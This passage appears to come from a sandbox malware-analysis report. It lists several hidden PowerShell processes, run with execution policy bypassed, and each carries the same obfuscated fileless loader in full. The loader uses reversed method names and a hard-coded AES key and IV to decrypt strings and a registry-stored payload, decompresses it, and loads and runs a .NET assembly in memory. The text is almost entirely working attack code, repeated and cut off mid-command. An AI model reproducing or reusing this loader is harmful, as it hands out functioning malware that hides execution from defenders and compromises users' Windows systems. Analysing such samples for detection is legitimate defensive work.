$AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4060
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      PID:452
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      PID:3536
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = 